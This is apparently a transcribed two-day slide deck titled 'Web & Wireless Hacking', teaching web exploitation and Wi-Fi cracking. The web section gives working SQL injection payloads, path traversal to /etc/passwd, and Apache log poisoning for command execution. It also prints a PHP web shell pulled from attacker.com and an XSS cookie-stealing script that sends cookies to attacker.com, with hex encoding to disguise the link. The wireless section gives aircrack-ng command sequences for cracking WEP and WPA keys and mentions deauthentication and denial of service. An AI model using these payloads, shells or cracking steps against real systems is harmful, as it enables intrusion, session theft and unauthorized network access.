web & wireless hacking
DESCRIPTION
Complete Guide on Web & Wireless HackingTRANSCRIPT
![Page 1: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/1.jpg)
IPSECS
www.ipsecs.com
WEB & WIRELESS HACKING
Don “df0x” Anto
Makasar, Juni 2009
![Page 2: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/2.jpg)
IPSECS
www.ipsecs.com
Content• Introduction• Web Exploitation
– SQL Injection– File Inclussion– XSS
• Breaking Wireless Infrastructure– War Driving– Exploiting Wireless Network
![Page 3: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/3.jpg)
IPSECS
www.ipsecs.com
Introduction• Don “df0x” Anto• IT security researcher• Hacker?? Not, but IT security researcher• Contact
• URL– http://ipsecs.com– http://kandangjamur.net
• Bachelor degree in Electrical engineering• Add my facebook [email protected]
![Page 4: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/4.jpg)
IPSECS
www.ipsecs.com
1st Day, WEB HACKING
![Page 5: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/5.jpg)
IPSECS
www.ipsecs.com
Web Exploitation• It's exploiting web application programming
flaws.• Programming mistakes are always happen.• Targeting clients or servers.• Possible to steal databases and other sensitif
informations, steal cookie or session, execute arbitrary commands, or fully compromise the system.
• It's easy to do. Google helps you :).
![Page 6: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/6.jpg)
IPSECS
www.ipsecs.com
Common Web Exploitation• SQL Injection, an attack which's targeting
sensitive information in database server. Possible to compromise system.
• File Inclussion, an attack which usually to gain shell access on the remote target.– Local file inclussion– Remote file inclussion
• Cross Site Scripting (XSS), an attack which targeting user or client of vulnerable website.– Doom– Persistent– Non-persistent
![Page 7: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/7.jpg)
IPSECS
www.ipsecs.com
SQL INJECTION
![Page 8: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/8.jpg)
IPSECS
www.ipsecs.com
SQL Injection• Injecting malicious SQL query to take profits.• Usually is used to bypass login, steal sensitive
information on database. Further attack can be used in fully compromising system.
• User input is not well validated or no sanitation process.
• All examples and demos bellow are in PHP MySQL.
![Page 9: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/9.jpg)
IPSECS
www.ipsecs.com
SQL Injection in login form• User input in login form is not validated before to
be executed in database.• Attacker is possible to send arbitrary SQL query
through login form and bypassing login process.• Attacker can also execute other SQL query.
![Page 10: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/10.jpg)
IPSECS
www.ipsecs.com
Vulnerable Code• Example vulnerable code in login process:
$pass = md5($_POST['password']);
$query = "SELECT * FROM tblUser WHERE username = '" . $_POST['username'] . "' AND password = '" . $pass . "'";
$q = mysql_query($query);
• Username which's sent from login form is not validated.
![Page 11: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/11.jpg)
IPSECS
www.ipsecs.com
Exploit Login• Exploit code:username = admin' OR 'a'='a
password = terserah
• SQL query to be executed by database server is:SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a'
AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
![Page 12: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/12.jpg)
IPSECS
www.ipsecs.com
SQL Injection in login form
![Page 13: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/13.jpg)
IPSECS
www.ipsecs.com
SQL Logic• AND operator is executed before OR, result of
query is:'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
• Boolean logic result is FALSE, then:username = 'admin' OR FALSE
• Boolean logic result is TRUE (admin).• Attacker successfully bypassing login form.
![Page 14: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/14.jpg)
IPSECS
www.ipsecs.com
SQL Injection in URI parameter• Parameter input in URI is not validated before to
be executed in database.• Attacker is possible to send arbitrary SQL query
by modifying parameter input.
![Page 15: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/15.jpg)
IPSECS
www.ipsecs.com
Vulnerable Code• Example vulnerable code while inputing URI
parameters:
$query = "SELECT * FROM news WHERE id=" . $_GET['aid'] ;
$q = mysql_query($query);
• Parameter 'aid' which's taken from URI is not validated.
![Page 16: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/16.jpg)
IPSECS
www.ipsecs.com
Exploiting SQL Injection• Checking vulnerability using AND logichttp://example.com/news.php?aid=1 AND 1=1--
http://example.com/news.php?aid=1 AND 1=0--
• Knowing number of field using UNION SELECT http://example.com/news.php?aid=1 UNION SELECT 1--
http://example.com/news.php?aid=1 UNION SELECT 1,2--
http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n--
![Page 17: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/17.jpg)
IPSECS
www.ipsecs.com
Knowing Number of Field
![Page 18: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/18.jpg)
IPSECS
www.ipsecs.com
SQL Injection in URI parameter• In Case table which generates “news”
contains 3 fields
![Page 19: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/19.jpg)
IPSECS
www.ipsecs.com
Exploiting SQL Injection• Knowing tables in databasehttp://example.com/news.php?aid=-1 UNION SELECT
1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--
• Knowing fields in table 'tblUser'http://example.com/news.php?aid=-1 UNION SELECT
1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'--
OR IN HEXAL
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572--
![Page 20: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/20.jpg)
IPSECS
www.ipsecs.com
Knowing Tables in DB
![Page 21: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/21.jpg)
IPSECS
www.ipsecs.com
Exploiting SQL Injection• Viewing information in tableshttp://example.com/news.php?aid=-1 UNION SELECT
1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser--
• Viewing arbitrary files (if FILE access is granted)http://example.com/news.php?aid=-1 UNION SELECT
1,2,LOAD_FILE('/etc/passwd')--
OR IN HEXAL
http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)--
![Page 22: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/22.jpg)
IPSECS
www.ipsecs.com
Viewing Table Records
![Page 23: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/23.jpg)
IPSECS
www.ipsecs.com
FILE INCLUSSION
![Page 24: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/24.jpg)
IPSECS
www.ipsecs.com
File Inclussion• Including malicious or sensitive file to be
executed by server.• Usually is used to steal sensitive information,
execute arbitrary command, or compromise system.
• User input is not well validated or no sanitation process.
• All examples and demos bellow are in PHP MySQL.
![Page 25: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/25.jpg)
IPSECS
www.ipsecs.com
Local File Inclussion• Including sensitive file in local server (vulnerable
server) to be executed by server.• Usually is used to steal sensitive information,
execute arbitrary command. Further attack can be used in fully compromising system.
• User input is not well validated or no sanitation process.
![Page 26: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/26.jpg)
IPSECS
www.ipsecs.com
Vulnerable Code• Example vulnerable code:
define('DOCROOT', '/var/www/html/modules');
$filename = DOCROOT . "/" . $_GET['module'] . ".php";
include($filename);
• Parameter 'module' which's taken from URI is not validated.
![Page 27: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/27.jpg)
IPSECS
www.ipsecs.com
Viewing Sensitive Files• Exploit code to viewing sensitive files on
vulnerable system:
http://example.com/index.php?module=../../../../../../../etc/passwd%00
http://example.com/index.php?module=../../../../../../../etc/group%00
![Page 28: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/28.jpg)
IPSECS
www.ipsecs.com
File /etc/passwd
![Page 29: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/29.jpg)
IPSECS
www.ipsecs.com
Placing Malicious Log• Placing malicious apache log uses telnet to inject
system command:
$ telnet example.com 80
Trying example.com...
Connected to example.com.
Escape character is '^]'.
GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1
Host:example.com
![Page 30: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/30.jpg)
IPSECS
www.ipsecs.com
Malicious Log
![Page 31: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/31.jpg)
IPSECS
www.ipsecs.com
Executing Command• Executing command via access_log apache (in
case apache log is readable)
http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=uname -a
http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=id
![Page 32: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/32.jpg)
IPSECS
www.ipsecs.com
Command “id”
![Page 33: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/33.jpg)
IPSECS
www.ipsecs.com
Remote File Inclussion• Including sensitive file in remote server (attacker
server) to be executed by server.• Usually to execute arbitrary command using web
shell. Further attack can be used in fully compormising system.
• User input is not well validated or no sanitation process.
![Page 34: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/34.jpg)
IPSECS
www.ipsecs.com
Vulnerable Code• Example vulnerable code:
$filename = $_GET['page'] . ".php";
include($filename);
• Parameter 'page' which's taken from URI is not validated.
![Page 35: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/35.jpg)
IPSECS
www.ipsecs.com
PHP Shell• Simple web shell:<?php
/*Basic PHP web shell injek.txt*/
if(isset($_GET['exec'])){
if(!empty($_GET['exec'])){
$cmd = $_GET['exec'];
if(function_exists('passthru')){
passthru($cmd);
}
}
}
?>
![Page 36: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/36.jpg)
IPSECS
www.ipsecs.com
Public PHP Shell• Widely known web shell : r57, c99• Commonly used in exploiting remote file
inclussion.
![Page 37: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/37.jpg)
IPSECS
www.ipsecs.com
r57
![Page 38: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/38.jpg)
IPSECS
www.ipsecs.com
Executing Command• Injecting command:
http://example.com/view.php?page=http://attacker.com/injek.txt&exec=id
http://example.com/view.php?page=http://attacker.com/injek.txt&exec=ls -al
![Page 39: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/39.jpg)
IPSECS
www.ipsecs.com
Command 'ls -al'
![Page 40: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/40.jpg)
IPSECS
www.ipsecs.com
CROSS SITE SCRIPTING
![Page 41: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/41.jpg)
IPSECS
www.ipsecs.com
Cross Site Scripting• Inserting HTML/java script code to be executed
by client browser which views vulnerable website.
• Usually is used in stealing cookie on computer client, phising, and tricking user to download arbitrary file.
• User input is not well validated or no sanitation process.
• All examples and demos bellow are in PHP MySQL.
![Page 42: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/42.jpg)
IPSECS
www.ipsecs.com
Cross Site Scripting• Doom based XSS, XSS in vulnerable file which
comes from default installed software.• Non-Persistent XSS, XSS in vulnerable web
page which can be exploited by tricking user to click malicious URI. Characteristic : temporal.
• Persistent XSS, XSS in vulnerable web page which can be exploited to insert malicious code to database. Characteristic : permanent.
![Page 43: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/43.jpg)
IPSECS
www.ipsecs.com
Vulnerable Code• Example vulnerable code:
echo "<pre> Searching for ". $_GET['key'] . "...</pre><br/>\n";
• Parameter 'key' which's sent from search form is not validated.
![Page 44: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/44.jpg)
IPSECS
www.ipsecs.com
Cross Site Scripting• Checking if XSS vulnerable:
http://example.com/search.php?key=<script>alert('XSS found dude!')</script>
![Page 45: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/45.jpg)
IPSECS
www.ipsecs.com
Cross Site Scripting
![Page 46: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/46.jpg)
IPSECS
www.ipsecs.com
Cookie Stealing• Stealing cookie:http://example.com/search.php?key=<script
src="http://attacker.com/payload.js"></script>
• Content payload.jsdocument.location="http://attacker.com/cookie-save.php?
c="+document.cookie
![Page 47: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/47.jpg)
IPSECS
www.ipsecs.com
Cookie Grabber• Content of cookie-save.php:<?php
/*Cookie stealer*/
$f = fopen('/tmp/cookie.txt', 'a');
$date = date("j F, Y, g:i a");
fwrite($f, "IP Address : ". $_SERVER['REMOTE_ADDR'] ."\n".
"Cookie : ". $_GET['c'] ."\n".
"Date and Time : ". $date ."\n".
"\n\n");
fclose($f);
?>
![Page 48: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/48.jpg)
IPSECS
www.ipsecs.com
Hexal Encoding• Anonymize malicious URI using hexal encoding:http://example.com/search.php?key=<script
src="http://attacker.com/payload.js"></script>
HEXAL ENCODING
http://example.com/search.php?key=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e
![Page 49: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/49.jpg)
IPSECS
www.ipsecs.com
DEMO - Q&A WEB HACKING
![Page 50: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/50.jpg)
IPSECS
www.ipsecs.com
THANK YOU!
![Page 51: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/51.jpg)
IPSECS
www.ipsecs.com
2nd Day, WIRELESS HACKING
![Page 52: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/52.jpg)
IPSECS
www.ipsecs.com
Wireless Network• Now, is widely used in campus, government,
company, and many public places.• Provide network for mobile devices.• More flexible than wired network.• More insecure than wired network, so here we
go!
![Page 53: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/53.jpg)
IPSECS
www.ipsecs.com
War Driving• Activity to search Wi-Fi wireless network.• Public tools to do War Driving
– Windows : NetStumbler, Wireshark– Linux : Kismet, AirCrack-ng, AirSnort, Wireshark– OSX : KisMac
• I'm using Linux Ubuntu 8.10.
![Page 54: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/54.jpg)
IPSECS
www.ipsecs.com
Kismet• Console based 802.11 wireless network detector
and sniffer.• It identifies wireless network by pasively sniffing.• It's already exist on Ubuntu Repository or you
can download from www.kismetwireless.net. • Use 'apt-get install kismet' on Ubuntu, read the
README if you want to install from source.
![Page 55: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/55.jpg)
IPSECS
www.ipsecs.com
Kismet
![Page 56: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/56.jpg)
IPSECS
www.ipsecs.com
Kismet
![Page 57: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/57.jpg)
IPSECS
www.ipsecs.com
Kismet
![Page 58: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/58.jpg)
IPSECS
www.ipsecs.com
AirSnort• GUI based 802.11 wireless network detector.• Designed for WEP Cracker.• It isn't ready on my Ubuntu repository, download
from www.sourceforge.net.• Read the README to install.
![Page 59: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/59.jpg)
IPSECS
www.ipsecs.com
aircrack-ng (formerly : aircrack)• Console based 802.11 wireless network
detector. • Designed for WEP & WPA-PSK Cracker.• It's already exist on Ubuntu repository or you can
downlod from www.aircrack-ng.org.• Use 'apt-get install aircrack-ng' on Ubuntu, read
the README if you want to install from source.
![Page 60: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/60.jpg)
IPSECS
www.ipsecs.com
aircrack-ng (formerly : aircrack)airodump wlan0
![Page 61: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/61.jpg)
IPSECS
www.ipsecs.com
Wireshark• GUI based network protocol analyzer for UNIX
and Windows.• The most complete protocol analyzer which
support many data communication protocols.• It's already exist on Ubuntu repository or you can
download from www.wireshark.org.• Use 'apt-get install wireshark' on Ubuntu,read the
README if you want to install from source.
![Page 62: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/62.jpg)
IPSECS
www.ipsecs.com
Wireshark
![Page 63: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/63.jpg)
IPSECS
www.ipsecs.com
NetStumbler• Best known windows tool to find wireless
networks.• It is function like Kismet on linux or KisMac on
OSX.• You can download NetStumbler in
www.netstumbler.com • Since I use ubuntu, there's no demo for this tool.
![Page 64: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/64.jpg)
IPSECS
www.ipsecs.com
NetStumbler
![Page 65: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/65.jpg)
IPSECS
www.ipsecs.com
Wireless Network Protection• MAC Filtering• WEP (Wired Equivalent Privacy)• WPA (Wi-Fi Protected Access)• WPA2 (Wi-Fi Protected Access 2)• Captive Portal
![Page 66: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/66.jpg)
IPSECS
www.ipsecs.com
Exploiting Wireless Network• Miss Configuration (Human Error)• Spoofing• Cracking Protection• Denial of Service
![Page 67: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/67.jpg)
IPSECS
www.ipsecs.com
Miss Configuration• Default Configuration on Device (Access Point)• Default Username & Password• Default Range IP Address• SNMP public & private community• No encryption enabled
![Page 68: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/68.jpg)
IPSECS
www.ipsecs.com
Spoofing & Rogue AP• Spoofing MAC address to bypass MAC filtering.• Tools
– Linux : ifconfig– Windows : smac, regedit
• Creating Rogue AP to trick wireless user, then doing Man in The Middle and sniffing.
• Tools– airsnarf http://airsnarf.shmoo.com
![Page 69: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/69.jpg)
IPSECS
www.ipsecs.com
MAC Spoofing
![Page 70: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/70.jpg)
IPSECS
www.ipsecs.com
WEP Cracking• WEP is based on RC4 algorithm and CRC32.• Collecting as much as possible weak IV
(Insialization Vector) to be used in FMS attack.• Accelerated collecting IV using traffic injection.• Tools : aircrack-ng, AirSnort
![Page 71: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/71.jpg)
IPSECS
www.ipsecs.com
WEP Cracking• Start interface on Monitor mode.• Run kismet to find AP target.• Find AP with connected clients on it. Or do fake
authentication to associate with AP if no client connected.
• Inject packet using aireplay-ng• Dump packet using airodump-ng• Crack dumped file using aircrack-ng
![Page 72: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/72.jpg)
IPSECS
www.ipsecs.com
Dumping Packet
airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0
![Page 73: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/73.jpg)
IPSECS
www.ipsecs.com
Cracking Key
aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap
Key is “abcdef1234”
![Page 74: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/74.jpg)
IPSECS
www.ipsecs.com
WPA Cracking• WPA is based on RC4 algorithm + TKIP/AES• WPA-PSK can be attack using dictionary attack.• Of course, it needs dictionary• Can be cracked when offline• Tools : aircrack-ng
![Page 75: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/75.jpg)
IPSECS
www.ipsecs.com
WPA Cracking• Start interface on Monitor mode.• Run kismet to find AP target.• Find AP with which,s protected by WPA.• Dump packet using airodump-ng• Wait for a client to authenticate to AP, or
deauthenticate client which's connected to AP.• Crack dumped file using aircrack-ng
![Page 76: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/76.jpg)
IPSECS
www.ipsecs.com
WPA Cracking
airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0
![Page 77: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/77.jpg)
IPSECS
www.ipsecs.com
WPA Cracking
aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap
Key is “miko2009”
![Page 78: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/78.jpg)
IPSECS
www.ipsecs.com
Denial of Service• Making wireless network unavailable.• Tools : airjack, void11, aircrack
![Page 79: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/79.jpg)
IPSECS
www.ipsecs.com
DEMO - Q&A WIRELESS HACKING
![Page 80: Web & Wireless Hacking](https://reader034.vdocuments.site/reader034/viewer/2022051210/54bb3d514a79590f7a8b45ec/html5/thumbnails/80.jpg)
IPSECS
www.ipsecs.com
THANK YOU!